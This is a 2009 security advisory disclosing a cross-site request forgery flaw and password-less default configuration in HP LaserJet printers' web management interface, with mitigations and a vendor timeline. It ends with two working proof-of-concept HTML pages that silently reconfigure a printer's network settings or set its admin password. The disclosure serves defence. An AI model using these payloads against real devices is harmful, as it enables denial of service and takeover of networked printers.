Louhi Networks Oy
                        -= Security Advisory =-


       Advisory: HP LaserJet multiple models web management CSRF
                 vulnerability & insecure default configuration
   Release Date: 2009-03-17
  Last Modified: 2009-03-17
        Authors: Henri Lindberg, CISA
                 [henri d0t lindberg at louhi d0t fi]

    Application: HP Embedded Web Server
        Devices: HP LaserJet M1522n MFP,
                 HP Color LaserJet 2605dtn
                 possibly other HP products
   Attack type : CSRF
           Risk: Low
  Vendor Status: Issue documented in a customer notice
     References: http://www.louhinetworks.fi/advisory/HP_20090317.txt
                  
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01684566


Overview:

     Quote from http://www.hp.com:

     "Increase effectiveness and productivity with an easy-to-use
      high-performance HP MFP. HP spherical toner and an intelligent
      cartridge optimise print quality and reliability. Do more with
      fast, high-quality print, copy, scan and fax functionality.

      This affordable HP MFP delivers print, copy, scan and fax
      functionality. Hi-Speed USB 2.0 connectivity and fast,
      secure networking enable you to  easily share this device.
      Handle complex files with a 450 MHz processor and memory up to
      64 MB."


Details:

      Default configuration for the device does not require user to
      define password for configuration changes.

      Insecure out-of-the-box configuration combined with CSRF
      vulnerability in web management interface allows attacker to
      perform unwanted configuration changes through user's browser.

      Successful exploitation requires:
      1) Out-of-the-box configuration (no management password)
      2) Internal user with access to web management interface
      3) Knowledge of target printer's DNS name or IP address
      4) Ability to lure internal user to a malicious website or
         ability to inject malicious HTML/javascript to website
         frequented by said internal user.

      Simplest management interfaces contains few interesting
      features, most significant impact can be achieved with invalid
      network configuration. This results in denial-of-service
      condition, requiring manual reconfiguration in order to
      restore network connectivity.

      More advanced management interfaces based on the some software
      may contain additional features suitable for exploitation.
      It is recommended to check the features of management interface
      in order to determine the actual risk for the used product.

Mitigation:

      1) Set administrator password
      2) Do not browse untrusted sites while logged on to the
         management interface


Advisory timeline:
       2009-02-17  Contacted vendor through e-mail.
       2009-02-17  Vendor response.
       2009-03-12  Vendor decides not to patch but to release
                   a customer notice
       2009-03-17  Coordinated release of information
                   Vendor's customer notice:
                   HP Security Notice HPSN-2009-001 rev.1
                   HP LaserJet Printers, HP Edgeline Printers,
                   and HP Digital Senders - Unverified Input



Proof of Concept:

<html>
<head><title>Network</title></head>
<body onload="document.CSRF.submit();">
<FORM name="CSRF" method="post"  
ACTION="http://1.2.3.4/hp/device/config_result_YesNo.html/config";  
style="display:none">
<input name="Clear" value="Yes">
<input name="Menu" value="NetIPChange">
<input name="Configuration"  
value="IPConfig=Man&amp;IPAddr=1.1.1.1&amp;SN=2.2.2.2&amp;GW=3.3.3.3&amp;WINS=0.0.0.0">
</form>
</body>
</html>

Invalid value for "Configuration" parameter sets IP, mask and gw to  
255.255.255.255


<html>
<head><title>Set password</title></head>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" method="post"  
ACTION="http://1.2.3.4/hp/device/set_config_password.html/config";  
style="display:none">
   <INPUT type="password" name="Password" MAXLENGTH="16" VALUE="evil">
   <INPUT type="password" name="ConfirmPassword" MAXLENGTH="16" VALUE="evil">
   <INPUT type="hidden" VALUE="System">
</FORM>
</body>
<html>